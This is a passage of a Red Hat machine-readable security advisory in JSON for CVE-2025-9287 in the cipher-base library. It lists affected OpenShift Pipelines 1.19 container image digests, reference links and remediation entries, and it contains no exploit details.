"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9287"
},
{
"category": "external",
"summary": "RHBZ#2389932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389932"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287"
},
{
"category": "external",
"summary": "https://github.com/browserify/cipher-base/pull/23",
"url": "https://github.com/browserify/cipher-base/pull/23"
},
{
"category": "external",
"summary": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc",
"url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
}
],
"release_date": "2025-08-20T21:43:56.548000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-09T10:09:13+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
